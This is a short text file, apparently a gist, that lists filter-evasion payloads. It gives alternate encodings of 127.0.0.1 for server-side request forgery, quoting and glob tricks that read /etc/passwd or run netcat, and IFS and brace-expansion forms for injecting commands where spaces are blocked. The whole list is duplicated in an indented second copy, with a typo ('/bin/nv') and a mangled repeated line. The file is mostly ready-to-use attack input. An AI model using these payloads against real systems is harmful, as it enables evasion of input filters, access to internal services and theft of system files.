bayotop/bypasses.txt

## bypasses.txt
# SSRF localhost (@omespino)

http://127.0.0.1
http://[::]/                # ipv6
http://0/
http://localtest.me         # dns to 127.0.0.1
http://2130706433/          # decimal
http://0x7f000001/          # hex
http://0x7f.0x00.0x00.0x01  # hex
http://0177.0.0.01          # octal

# bash wildcards (@omespino)

/bin/cat /etc/passwd
/b'i'n/c'a't /e't'c/p'a's's'w'd'
/??'?'/?'a't /???/????'w'w?
/???/?at /???/????w?

/bin/nv 127.0.0.1 80
/b'i'n/'n'c 2130706433 80
/usr/b'i'n/'n'c 2130706433 80
/???/???/n? 2130706433 80

echo /*/*ss*

# blocked spaces (@omespino)

IFS=,;`cat<<<cat,/etc/passwd`
IFS=,;$(cat<<<cat,/etc/passwd)
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd} OR {ls,-las,/var} with args
X=$'cat\x20/etc/passwd'&&$X
cat$IFS$@/etc/passwd # @p1onk
	# SSRF localhost (@omespino)

	http://127.0.0.1
	http://[::]/ # ipv6
	http://0/
	http://localtest.me # dns to 127.0.0.1
	http://2130706433/ # decimal
	http://0x7f000001/ # hex
	http://0x7f.0x00.0x00.0x01 # hex
	http://0177.0.0.01 # octal

	# bash wildcards (@omespino)

	/bin/cat /etc/passwd
	/b'i'n/c'a't /e't'c/p'a's's'w'd'
	/??'?'/?'a't /???/????'w'w?
	/???/?at /???/????w?

	/bin/nv 127.0.0.1 80
	/b'i'n/'n'c 2130706433 80
	/usr/b'i'n/'n'c 2130706433 80
	/???/???/n? 2130706433 80

	echo //ss*

	# blocked spaces (@omespino)

	IFS=,;`cat<<<cat,/etc/passwd`
	IFS=,;$(cat<<<cat,/etc/passwd)
	cat$IFS/etc/passwd
	cat${IFS}/etc/passwd
	cat</etc/passwd
	{cat,/etc/passwd} OR {ls,-las,/var} with args
	X=$'cat\x20/etc/passwd'&&$X
	cat$IFS$@/etc/passwd # @p1onk